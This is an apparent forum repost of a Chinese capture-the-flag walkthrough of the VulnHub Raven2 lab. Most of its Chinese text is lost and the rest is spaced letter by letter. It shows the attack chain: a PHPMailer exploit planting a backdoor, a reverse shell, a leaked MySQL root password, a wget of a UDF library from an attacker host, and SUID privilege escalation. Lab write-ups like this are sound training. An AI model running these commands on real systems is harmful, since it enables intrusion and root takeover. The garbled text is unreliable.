[26850] 2019-10-12_【VulnHub】Raven2靶机的渗透测试

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-19
2019-10-12_【VulnHub】Raven2靶机的渗透测试 V u l n H u b R a v e n :   2       M s 0 8 0 6 7   2 0 1 9 - 1 0 - 1 2   #   , 2 3 M s 0 8 0 6 7 1 .   使 n e t d i s c o v e r 2 .   P H P M a i l e r s h e l l 3 .   P y t h o n E X P 4 .   w o r d p r e s s w p - c o n f i g . p h p 5 .   M y S Q L   < =   5 . 7 . 1 4   5 . 6 . 3 2   5 . 5 . 5 1       U D F 6 .   K A L I E X P 7 .   c h m o d   u + s   s u i d r o o t 8 .   s u i d f i n d r o o t   s h e l l   h t t p s : / / d o w n l o a d . v u l n h u b . c o m / r a v e n / R a v e n 2 . o v a   R a v e n   2 b o o t 2 r o o t   R a v e n   S e c u r i t y 4 f l a g ! . n e t d i s c o v e r e h 0 n e t d i s c o v e r   - i   e t h 0
1 9 2 . 1 6 8 . 6 1 . 1 3 5 I P n m a p   - A   1 9 2 . 1 6 8 . 6 1 . 1 3 5 n m a p I P 2 2 8 0 1 1 1 3 8 0
g o b u s t e r g o b u s t e r   - u   h t t p : / / 1 9 2 . 1 6 8 . 6 1 . 1 3 5   - w   / u s r / s h a r e / w o r d l i s t s / d i r b / c o m m o n . t x t v e n d o r h t t p : / / 1 9 2 . 1 6 8 . 6 1 . 1 3 5 / v e n d o r / P A T H F L A G
F L A G / v a r / w w w / h t m l / P H P M a i l e r k a l i s e a r c h s p l o i t P H P M a i l e r s e a r c h s p l o i t   p h p m a i l e r P H P M a i l e r V E R S I O N P H P M a i l e r s e a r c h s p l o i t   - x   e x p l o i t s / p h p / w e b a p p s / 4 0 9 7 4 . p y E X P e x p l o i t - d b . c o m e x p h t t p s : / / w w w . e x p l o i t - d b . c o m / e x p l o i t s / 4 0 9 7 4 e x p l o i t - d b C V E - 2 0 1 6 - 1 0 0 3 3 h t t p s : / / w w w . a n q u a n k e . c o m / p o s t / i d / 8 5 2 9 5 h t t p : / / 1 9 2 . 1 6 8 . 6 1 . 1 3 5 / / c o n t a c t . p h p E X P 1 .   # ! / u s r / b i n / p y t h o n #   - * -   c o d i n g :   u t f - 8   - * -
2 .   t a r g e t C O N T A C T h t t p : / / 1 9 2 . 1 6 8 . 6 1 . 1 3 5 / c o n t a c t . p h p b a c k d o o r / s d f z . p h p , b a c k d o o r . p h p b a n 3 .   p a y l o a d 4 .   p i p   i n s t a l l   r e q u e s t s - t o o l b e l t 5 .   K A L I   n c 6 .   访 h t t p : / / 1 9 2 . 1 6 8 . 6 1 . 1 3 5 / c o n t a c t . p h p p a y l o a d s d f z . p h p 7 .   访 h t t p : / / 1 9 2 . 1 6 8 . 6 1 . 1 3 5 / s d f z . p h p 8 .   s h e l l
p y t h o n p t y p y t h o n   - c   ' i m p o r t   p t y ; p t y . s p a w n ( " / b i n / b a s h " ) ' f l a g f i n d   /   - n a m e   " f l a g * " 2 f l a g F L A G r o o t h t t p s : / / g i t h u b . c o m / d i r t y c o w / d i r t y c o w . g i t h u b . i o / w i k i / P o C s d i r t y . c k a l i g c c   - p t h r e a d   d i r t y . c   - o   d i r t y   - l c r y p t k a l i p y t h o n   S i m p l e H T T P S e r v e r H T T P w g e t w g e t L i n E n u m . s h L I N U X 便 使 h t t p s : / / g i t h u b . c o m / r e b o o t u s e r / L i n E n u m
m y s q l 使 r o o t h t t p s : / / l e g a l h a c k e r s . c o m / a d v i s o r i e s / M y S Q L - E x p l o i t - R e m o t e - R o o t - C o d e - E x e c u t i o n - P r i v e s c - C V E - 2 0 1 6 - 6 6 6 2 . h t m l   M y S Q L   < =   5 . 7 . 1 4 5 . 6 . 3 2 5 . 5 . 5 1 M y S Q L - E x p l o i t - R e m o t e - R o o t - C o d e - E x e c u t i o n - P r i v e s c l s w o r d p r e s s ( w p ) w p r o o t R @ v 3 n S e c u r i t y   m y s q l m y s q l
M y s q l h t t p s : / / w w w . e x p l o i t - d b . c o m / e x p l o i t s / 1 5 1 8 E X P K A L I s o w g e t   h t t p s : / / w w w . e x p l o i t - d b . c o m / d o w n l o a d / 1 5 1 8 m v   1 5 1 8   r a p t o r _ u d f . c g c c   - g   - c   r a p t o r _ u d f . c g c c   - g   - s h a r e d   - o     r a p t o r _ u d f . s o   r a p t o r _ u d f . o   - l c m v   r a p t o r _ u d f . s o   s d f z _ u d f . s o w g e t s d f z _ u d f . s o c d   / t m p w g e t   h t t p : / / 1 9 2 . 1 6 8 . 6 1 . 1 3 0 : 8 0 0 0 / s d f z _ u d f . s o
m y s q l >   u s e   m y s q l ; u s e   m y s q l ; R e a d i n g   t a b l e   i n f o r m a t i o n   f o r   c o m p l e t i o n   o f   t a b l e   a n d   c o l u m n   n a m e s Y o u   c a n   t u r n   o f f   t h i s   f e a t u r e   t o   g e t   a   q u i c k e r   s t a r t u p   w i t h   - A   D a t a b a s e   c h a n g e d m y s q l >   c r e a t e   t a b l e   f o o ( l i n e   b l o b ) ; c r e a t e   t a b l e   f o o ( l i n e   b l o b ) ; Q u e r y   O K ,   0   r o w s   a f f e c t e d   ( 0 . 0 6   s e c )   m y s q l >   i n s e r t   i n t o   f o o   v a l u e s ( l o a d _ f i l e ( ' / t m p / s d f z _ u d f . s o ' ) ) ; i n s e r t   i n t o   f o o   v a l u e s ( l o a d _ f i l e ( ' / t m p / s d f z _ u d f . s o ' ) ) ; Q u e r y   O K ,   1   r o w   a f f e c t e d   ( 0 . 0 0   s e c )   m y s q l >   s e l e c t   *   f r o m   f o o   i n t o   d u m p f i l e   ' / u s r / l i b / m y s q l / p l u g i n / s d f z _ u d f . s o ' ; d u m p f i l e p l u g i n s e l e c t   *   f r o m   f o o   i n t o   d u m p f i l e   ' / u s r / l i b / m y s q l / p l u g i n / s d f z _ u d f . s o ' ; Q u e r y   O K ,   1   r o w   a f f e c t e d   ( 0 . 0 4   s e c )   m y s q l >   c r e a t e   f u n c t i o n   d o _ s y s t e m   r e t u r n s   i n t e g e r   s o n a m e   ' s d f z _ u d f . s o ' ; c r e a t e   f u n c t i o n   d o _ s y s t e m   r e t u r n s   i n t e g e r   s o n a m e   ' s d f z _ u d f . s o ' ; Q u e r y   O K ,   0   r o w s   a f f e c t e d   ( 0 . 0 0   s e c )   m y s q l >   s e l e c t   *   f r o m   m y s q l . f u n c ; s e l e c t   *   f r o m   m y s q l . f u n c ; + - - - - - - - - - - - + - - - - - + - - - - - - - - - - - - - + - - - - - - - - - - + |   n a m e             |   r e t   |   d l                     |   t y p e           | + - - - - - - - - - - - + - - - - - + - - - - - - - - - - - - - + - - - - - - - - - - + |   d o _ s y s t e m   |       2   |   s d f z _ u d f . s o   |   f u n c t i o n   | + - - - - - - - - - - - + - - - - - + - - - - - - - - - - - - - + - - - - - - - - - - + 1   r o w   i n   s e t   ( 0 . 0 0   s e c )   m y s q l >   s e l e c t   d o _ s y s t e m ( ' c h m o d   u + s   / u s r / b i n / f i n d ' ) ; c h m o d   u + s   s u i d r o o t s e l e c t   d o _ s y s t e m ( ' c h m o d   u + s   / u s r / b i n / f i n d ' ) ; + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + |   d o _ s y s t e m ( ' c h m o d   u + s   / u s r / b i n / f i n d ' )   | + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + |                                                                         0   | + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + 1   r o w   i n   s e t   ( 0 . 0 0   s e c )   m y s q l >   e x i t e x i t B y e f i n d f l a g 4
M s 0 8 0 6 7   m s 0 8 0 6 7
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则